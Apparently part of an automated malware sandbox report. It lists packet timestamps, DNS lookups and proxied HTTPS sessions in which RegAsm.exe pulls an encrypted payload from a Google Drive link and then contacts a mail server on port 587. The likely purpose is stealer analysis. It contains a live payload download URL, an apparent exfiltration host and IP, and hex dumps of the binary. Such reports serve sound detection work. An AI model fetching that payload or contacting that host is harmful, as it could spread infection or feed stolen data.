Oct 13, 2021 13:08:14.359857082 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.360079050 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.545202971 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.545799017 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.596400023 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.596693039 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.649461031 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.652422905 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.713670015 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.713732004 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.713771105 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.713912010 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.722609043 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:14.773189068 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:14.823795080 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:15.799772024 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:15.849793911 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:15.851572037 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:15.902158022 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:15.902633905 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:15.992692947 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.001611948 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.002186060 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.052320957 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.052683115 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.115076065 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.115494967 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.165503979 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.214108944 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.217000008 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.217078924 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.217093945 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.217175961 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:08:16.267276049 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.267335892 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.267374039 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.267410040 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.289213896 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:08:16.339061975 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:09:54.177329063 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:09:54.229832888 CEST	587	49768	188.93.227.195	192.168.11.20
Oct 13, 2021 13:09:54.230082989 CEST	49768	587	192.168.11.20	188.93.227.195
Oct 13, 2021 13:09:54.230460882 CEST	49768	587	192.168.11.20	188.93.227.195

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 13:06:37.400597095 CEST	60057	53	192.168.11.20	1.1.1.1
Oct 13, 2021 13:06:37.409956932 CEST	53	60057	1.1.1.1	192.168.11.20
Oct 13, 2021 13:06:38.103961945 CEST	56177	53	192.168.11.20	1.1.1.1
Oct 13, 2021 13:06:38.138346910 CEST	53	56177	1.1.1.1	192.168.11.20
Oct 13, 2021 13:08:14.143503904 CEST	50194	53	192.168.11.20	1.1.1.1
Oct 13, 2021 13:08:14.253453016 CEST	53	50194	1.1.1.1	192.168.11.20
Oct 13, 2021 13:08:15.095901012 CEST	59485	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 13:06:37.400597095 CEST	192.168.11.20	1.1.1.1	0x72c5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Oct 13, 2021 13:06:38.103961945 CEST	192.168.11.20	1.1.1.1	0x70d6	Standard query (0)	doc-04-ak-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Oct 13, 2021 13:08:14.143503904 CEST	192.168.11.20	1.1.1.1	0x521	Standard query (0)	mail.tccinfaes.com	A (IP address)	IN (0x0001)
Oct 13, 2021 13:08:15.095901012 CEST	192.168.11.20	1.1.1.1	0xe9b1	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 13:05:42.829720974 CEST	1.1.1.1	192.168.11.20	0x6ef6	No error (0)	devcenterapi.azure-api.net	apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 13:05:42.829720974 CEST	1.1.1.1	192.168.11.20	0x6ef6	No error (0)	devcenterapi-eastus-01.regional.azure-api.net	apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 13:06:37.409956932 CEST	1.1.1.1	192.168.11.20	0x72c5	No error (0)	drive.google.com		142.250.185.174	A (IP address)	IN (0x0001)
Oct 13, 2021 13:06:38.138346910 CEST	1.1.1.1	192.168.11.20	0x70d6	No error (0)	doc-04-ak-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 13:06:38.138346910 CEST	1.1.1.1	192.168.11.20	0x70d6	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)
Oct 13, 2021 13:08:14.253453016 CEST	1.1.1.1	192.168.11.20	0x521	No error (0)	mail.tccinfaes.com	tccinfaes.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 13:08:14.253453016 CEST	1.1.1.1	192.168.11.20	0x521	No error (0)	tccinfaes.com		188.93.227.195	A (IP address)	IN (0x0001)
Oct 13, 2021 13:08:15.105354071 CEST	1.1.1.1	192.168.11.20	0xe9b1	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 13:11:55.229016066 CEST	1.1.1.1	192.168.11.20	0xca4d	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-04-ak-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49755	142.250.185.174	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 11:06:37 UTC	0	OUT	GET /uc?export=download&id=1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-10-13 11:06:38 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 11:06:37 GMT Location: https://doc-04-ak-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq835moktnu71nht8627dleqonv/1634123175000/00240525256395999725/*/1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'nonce-Or3rYL/SczOidf/0xFhdmQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=RuYp0i-dRpZWJeYEnHmh235XiDttSUzYs6yg_qxbWhwIBJF6YaYLTiQ8CmWrG4TN0ye59Z9iXOzQssbRnSdJLbd1wzBYE5BlaN0YyuUkdOdPWeNA5aicrcO5Dy2nPSIwzxbAi1v9tzq7hKiIUIpMshgDDLzw3D3zbFqIK2JnI8U; expires=Thu, 14-Apr-2022 11:06:37 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-10-13 11:06:38 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 61 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 71 63 31 66 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-ak-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1f
2021-10-13 11:06:38 UTC	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49756	142.250.185.161	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 11:06:38 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qc1fdhq835moktnu71nht8627dleqonv/1634123175000/00240525256395999725/*/1sPphH_DrSUT3UeS4UDzeclKCi9pqFiSe?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-ak-docs.googleusercontent.com Connection: Keep-Alive
2021-10-13 11:06:38 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduV4gRLd11r_vu3zwe8icMKRo1q5oFztgtnAw26kR_qReUvlDw4pr9Q-i6OTWFGedrS7F_KBlSY-epW6QJkqBY Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="noekon2ti_QmKVxurW139.bin";filename*=UTF-8''noekon2ti_QmKVxurW139.bin Content-Length: 221760 Date: Wed, 13 Oct 2021 11:06:38 GMT Expires: Wed, 13 Oct 2021 11:06:38 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=7mzgBQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-13 11:06:38 UTC	5	IN	Data Raw: c2 cb 36 f3 53 48 99 71 d1 9d 21 3a 68 27 14 63 fb 79 aa 8c be fa ca f5 94 61 76 93 37 7a 7b b4 ec e8 63 db f9 8e 1a 35 73 df 87 c7 3b 93 ec 71 99 32 b3 f5 1e bb 29 5a 30 1c 63 52 07 37 b0 8b e3 8f 65 77 e9 0c 84 86 89 55 00 2f 1d 53 10 b3 38 a3 42 78 fd bd 1a 63 a3 6a b9 02 d5 96 86 6e 82 38 83 f6 b2 52 2e f6 7a eb 4c ad 05 d0 99 5a 8f e3 f8 bc f1 cb ee 21 30 c5 2a 7a de a9 c9 e6 65 19 e4 9a 7f ac 39 84 c9 4e bd bf 7e a3 5b 48 39 e0 68 cf e5 b3 fa 32 f3 da 8d 98 3c 2d 56 0e 6a 10 cd 60 8d 6e 86 b6 8f 25 71 b2 7b 77 c3 f8 a8 23 53 09 e6 f8 09 23 04 22 4d b0 87 cc 10 b2 0a 3c b3 90 6e 13 92 b1 92 e2 54 f2 99 81 30 f1 9f f8 e5 b6 1c ad a4 07 73 18 1f 2b d6 8c e4 8a 9e 29 81 ce b3 f5 f9 ef e0 88 93 0a 1e c1 e1 27 94 7f ba 64 e0 88 0d 0d b3 ff 6d 6d 74 d3 f6 Data Ascii: 6SHq!:h'cyav7z{c5s;q2)Z0cR7ewU/S8Bxcjn8R.zLZ!0*ze9N~[H9h2<-Vj`n%q{w#S#"M<nT0s+)'dmmt
2021-10-13 11:06:38 UTC	9	IN	Data Raw: 94 0b 43 38 6b 0d 35 be 00 a7 c2 c3 d1 83 4a 16 fd 68 38 90 d2 19 92 3d 64 e4 f3 0c 46 77 22 4d ba 5b e4 3e b0 5a 7f b9 4e 30 3a a6 b1 73 ee 28 bd 9b 81 36 fb b7 c0 e5 b6 f6 73 a6 00 52 19 14 2b d7 fc e7 8a 9c 21 f8 ce a5 7a f9 e5 8e fe 90 0a 1c e1 b8 27 d6 e4 ba 6e e0 88 4d 0d b3 df 6d 6d d9 7c f6 89 40 74 8e 55 6e 95 9a a9 dd 70 e4 83 31 7c 29 c6 a8 62 0b 89 06 4d b4 f9 7e 44 2f de 95 b5 e4 76 1d 20 f8 e8 20 06 f9 ee f9 aa 86 db 4b fc a6 68 58 c5 b0 91 3f 74 e5 10 0b b0 7a 83 ca db 26 ff a9 0f 82 c6 c3 76 ef 85 99 c6 ca 5a 5e 3c b9 7a 74 ff e9 46 40 e2 2d b1 8b a8 02 54 69 52 85 bf 05 e1 34 64 cc 15 e0 44 80 ff 93 58 e3 88 20 33 0f fc 45 7f d1 66 66 55 ff b6 ca cd 82 5e f4 76 49 01 1c 97 82 3c c7 e0 e7 73 ad 32 c1 8a 15 b4 6e 3a a9 c6 73 73 0e 98 32 d1 Data Ascii: C8k5Jh8=dFw"M[>ZN0:s(6sR+!z'nMmm\|@tUnp1\|)bM~D/v KhX?tz&vZ^<ztF@-TiR4dDX 3EffU^vI<s2n:ss2
2021-10-13 11:06:38 UTC	13	IN	Data Raw: 88 12 01 b0 cf f6 97 df 26 e4 ab 0f a5 57 8d 5a e4 86 b7 95 86 58 54 31 c9 3c 67 fb e3 51 6c b8 d1 b0 a1 c4 4b 47 6d 58 92 d4 48 f5 ca 6f eb 1f 9d 61 91 81 8a 37 b0 8c 82 26 32 a1 43 7f c6 74 51 6a 01 b7 ec d6 cb ca fa 08 51 06 73 c7 20 23 df ff e4 1c e4 36 d7 7e a3 8f bb a0 91 c2 73 63 07 84 32 37 2d d0 47 0c 6c 80 18 a5 7d 49 24 a7 34 ff 80 02 73 81 65 56 6b e5 0a b3 df 9a ce 78 ef 86 c3 dd c8 3f 99 84 67 0c 81 65 45 9c 32 d1 c8 71 39 b4 4a 76 ae 8b e4 a5 fa e5 63 56 4a 43 06 30 12 57 4d b1 5b 05 dc 2d cd eb ba 7f 52 03 ad 44 64 f3 de 82 71 0d f2 0d b5 08 25 2a f5 3f 13 7d ce a6 a0 71 2b 70 9e ed 35 cb 99 66 5c a3 4f 68 62 8a 1f 25 18 e3 a1 15 94 0f 24 41 91 3c bd da dd 69 8b 6d a2 f9 be 7b 89 f7 3f fa a6 b7 23 b5 d1 3d 2d 84 b3 5d 23 88 ad 57 ba be 67 Data Ascii: &WZXT1<gQlKGmXHoa7&2CtQjQs #6~sc27-Gl}I$4seVkx?geE2q9JvcVJC0WM[-RDdq%*?}q+p5f\Ohb%$A<im{?#=-]#Wg
2021-10-13 11:06:38 UTC	16	IN	Data Raw: d6 63 51 58 63 07 0d 18 54 8f 9a b8 2b c6 e9 cd ed b2 89 c6 26 85 79 4c 85 d6 91 5f 0d 51 0d b5 08 e4 20 68 68 3b f2 ce 8e 3d 05 25 7a 81 fc d6 52 99 66 57 55 db 4d 4a b7 37 52 10 f0 8e 15 37 0f 24 41 67 44 ae d2 f3 a8 10 6d a4 9c 50 5e 89 fd eb dd 18 9f 14 bf f9 72 3c ae 9d 4d b8 88 a7 83 92 89 6f 53 35 81 b0 28 4d b4 00 04 57 d0 98 45 c6 84 ef 0f 21 58 bb d4 84 0c 8b 5b 02 a6 dd dd a3 42 fe 3f 5f 1a b0 82 c4 64 7e cd ef cc de 3b 46 72 69 4b c4 17 83 87 8f 3e d0 5d 29 77 e7 b6 f4 6b d0 bd 13 a5 be 6d 4f da 10 ea 3e f2 00 a9 ae 9d 77 58 a9 f3 bf 22 dd c9 22 4a 90 1e 48 03 c1 67 81 1e 27 7c ca e8 db 56 a7 90 82 23 d3 df 45 74 b8 1c c7 a9 08 83 6a c8 23 33 f6 b6 0c 71 1c b3 1e eb cf af 9c dd 9c c7 2f 77 47 b5 81 64 f8 ba ea bd 29 51 07 3b 32 b1 cf 74 7a 81 Data Ascii: cQXcT+&yL_Q hh;=%zRfWUMJ7R7$AgDmP^r<MoS5(MWE!X[B?_d~;FriK>])wkmO>wX""JHg'\|V#Etj#3q/wGd)Q;2tz
2021-10-13 11:06:38 UTC	18	IN	Data Raw: ea 0c 80 91 be 68 28 ef e0 ac 16 9b aa a3 42 7e d5 95 1a 63 e5 7b be 6d 07 96 86 64 aa 1c 83 f6 b8 46 38 de 48 eb 4c ab 23 0d a3 5b 8f e3 dd 94 c6 cb ee 2b 23 f8 3e 69 59 81 f1 e6 6b 0c 83 b1 7e 18 30 37 e6 f6 bc f7 ab c2 93 20 50 93 53 32 82 dc 9d 41 81 f7 bc bb 4b 6b f7 63 1e 36 0d 14 ed 0b 8d cf af 4c 1b ba 7a 3a 90 de ed 1b 35 6c ce 9a 7c 29 20 28 ef a1 c7 d4 38 ea 58 79 b5 32 33 52 88 99 0a e4 00 99 8a c3 22 b3 e1 ee e5 b6 f8 85 dc 06 78 13 b6 3a 96 ce cf ec 9c 21 87 6c a2 b5 d1 94 8e fe 9a 22 79 e3 e1 21 bc 57 ba 64 e6 99 4a 62 61 df 6d 67 5c 01 f4 9b 5c 5c a0 56 75 a3 f0 d1 ca 71 ee ab 4c 7e 29 d1 82 36 42 89 0c 6f ee ca 7e 42 f3 59 93 9d ae 5e 2a 2a 97 a9 34 15 f4 c0 d6 c5 ca d1 95 88 de 46 78 8b b4 88 63 4f cd 87 01 b6 67 c4 ac db 26 f3 be 17 df Data Ascii: h(B~c{mdF8HL#[+#>iYk~07 PS2AKkc6Lz:5l\|) (8Xy23R"x:!l"y!WdJbamg\\\VuqL~)6Bo~BY^**4FxcOg&
2021-10-13 11:06:38 UTC	19	IN	Data Raw: 2d a8 2f cd ed b8 0f ce 03 ad 5d 4c 85 dc e9 70 25 69 02 b5 02 3a 3a 79 60 12 7d cf 8e 3b 0b 2c 7a 81 e9 b9 94 99 ee 5a 8b d4 67 62 80 37 48 1a e3 a6 3d 0f 0f 24 dc be 44 bf d4 db 41 10 c8 a5 f3 96 52 89 f7 35 c8 3d b7 22 bf f9 78 2f 35 b2 75 b8 86 ad 5d 92 27 60 7b 20 8f b0 2e 22 68 00 04 5c 0e 94 6d f1 4a e8 05 09 6e bb d4 8e 0e 8c 4a 0a 81 28 dd a3 5e 91 f9 5e 1a ba 5c cb aa 51 fa ef c2 d4 28 6d a3 56 4b c4 12 5d 87 9e 2c f8 81 28 77 e1 d9 32 63 d8 b7 cd a4 9b 45 78 cc 18 e0 2d d1 28 91 ae 87 7d 86 a8 e2 b7 0a 61 ec 2a 4c ff d6 48 03 cb 8a 86 3b 0f 44 ca e8 d1 5f 8a b8 bb 23 d3 d5 9b 36 a1 14 ef 4d 08 83 6c f7 ed 33 f6 b3 d2 7e 39 81 29 eb ce a5 8f f3 b4 a0 27 77 4d 65 81 75 f0 ff 0c bd 29 58 68 fd 32 ab c5 aa 74 a4 e8 25 58 c2 1b 61 de 3d d6 41 e8 e7 Data Ascii: -/]Lp%i::y`};,zZgb7H=$DAR5="x/5u]'`{ ."h\mJnJ(^^\Q(mVK],(w2cEx-(}a*LH;D_#6Ml3~9)'wMeu)Xh2t%Xa=A
2021-10-13 11:06:38 UTC	20	IN	Data Raw: 87 82 5f f0 55 38 8e c9 d4 c9 4e eb 69 96 c5 c6 37 63 5d a1 10 e1 37 eb 3b e1 fd 2b 15 60 16 2a 98 2a 8f db cd 5b d7 a3 a8 bb 42 d8 10 b1 86 22 20 cb 6f 5e d2 32 3f 63 f8 80 85 47 2c 96 9a 23 d2 23 c0 8b 64 cb 3c 18 69 b4 2b f4 5b ef 27 e2 9d 9e 51 00 3e e6 b1 ee b2 ac a6 55 52 e3 ae 1e 63 f2 6e a0 fc d4 ba 83 78 8e 22 90 f2 b2 43 2a ed 84 ea 60 aa 0c d8 03 51 93 f0 fc bc e0 cf f6 df 31 e9 23 52 6d a9 c9 ec 66 1f 4d 90 7f 09 34 5e 16 f7 90 f0 ab 91 0b 20 41 97 5e 41 96 f0 9e 57 81 b3 ad ea 59 5d c6 60 32 32 84 00 95 64 0c 27 50 44 08 44 33 30 99 56 72 7e 8e 7a e2 ee 34 2d 20 a5 4f b0 87 e4 10 b2 4b 51 6a 92 22 14 9b c2 ad e5 00 95 8a 86 4e eb 9f f8 e1 9a ad bc a1 78 63 19 14 2f b9 34 e6 8a 98 37 7f cf cd ee f9 ef 8a e8 6e 0b 7e cd d1 36 93 10 5b 65 e0 8e Data Ascii: _U8Ni7c]7;+`*[B" o^2?cG,##d<i+['Q>URcnx"C`Q1#RmfM4^ A^AWY]`22d'PDD30Vr~z4- OKQj"Nxc/47n~6[e
2021-10-13 11:06:38 UTC	22	IN	Data Raw: 90 5d 80 c6 75 d0 1c 95 26 c9 24 e6 bb 26 45 ab f6 70 67 b4 23 df 05 19 82 06 5d ca 1d 56 61 c5 13 98 d1 9a ce 61 11 87 e7 cf e0 2a 8f 8f 4a 78 7c 62 52 68 5c 03 ca 69 38 be 54 6c 50 82 d1 59 ec c2 70 57 7a 5e 05 1c 16 54 ab 98 b8 2b c6 57 cd ed b2 5d d3 0f ad 46 5a 7b dd ae 75 32 65 0d bd 1d 28 de 78 4c 11 56 ca b6 48 8f d4 85 ab e7 b9 94 82 56 59 8b 1f 68 62 80 1d 52 1a f2 a5 15 f0 0f 24 41 d6 70 bf da d1 2e 25 6d a2 f9 9c 83 3a f7 35 d2 18 9f 14 bf f9 72 23 86 9d 8a b8 88 a7 4e 96 b8 67 7f 20 80 3d 55 22 72 01 09 8d 72 94 6d f0 ac fb 05 09 6a 93 d4 8f d2 81 43 84 39 f0 65 b0 41 87 f2 4e 1e d5 5d ca 41 5c f3 fe c9 c6 29 45 1b 51 4b c2 3b 5a f1 f2 e6 84 81 29 76 c9 cd 32 6b da 9f cd ab 9b 4f 14 81 38 71 2d de 22 26 bd 9b 6b 97 af f1 be 19 66 e2 19 6c ff Data Ascii: ]u&$&Epg#]Vaa*Jx\|bRh\i8TlPYpWz^T+W]FZ{u2e(xLVHVYhbR$Ap.%m:5r#Ng =U"rrmjC9eAN]A\)EQK;Z)v2kO8q-"&kfl
2021-10-13 11:06:38 UTC	23	IN	Data Raw: f4 5f 3e 1a 04 da 18 97 c0 b0 1f 39 34 30 c6 f3 5a d5 d5 7b b1 aa c2 e3 7d 9e e5 06 6f 1c b3 1d 6f 1b d4 cc 2a 34 83 5d 9a 9d 2b 1b 99 1b 76 6d 83 ec c1 54 75 90 06 b0 7e 38 b7 2c 39 b1 e5 91 14 95 96 c7 b2 29 96 9c 8b 70 22 73 bb c4 ed 48 fb 5f 35 89 24 d1 e5 5d c4 7a 50 bb 15 cb 8b 48 8f 10 f0 20 c6 c7 e0 4d 29 3e 65 09 4c 67 c4 66 c0 de b5 58 ab a1 85 21 36 eb 52 6e 09 0c c4 58 35 bf b1 38 69 fa c0 75 47 3d b4 eb 4c d2 25 40 b6 77 cf 38 77 49 ae d5 f1 5b d4 72 a7 86 8d 51 17 1c fa d2 35 b3 80 a7 cc cf eb 8c 36 4b a9 6a b9 04 f8 93 5b 3d 85 38 83 dd ac 2c 0d f6 7a ef 54 9e 13 ae bc 5a 8f e7 76 0b e7 fa e2 09 7b c5 2a 7c 73 ac 14 d5 6c 06 5e bc 36 18 30 4f ea e8 fc 18 b3 82 0f 5e 5d 93 48 bb bf 33 9f 40 94 9f ed fb 5d 49 0b 78 60 38 af 05 a9 34 03 da af Data Ascii: _>940Z{}oo4]+vmTu~8,9)p"sH_5$]zPH M)>eLgfX!6RnX58iuG=L%@w8wI[rQ56Kj[=8,zTZv{\|sl^60O^]H3@]Ix`84
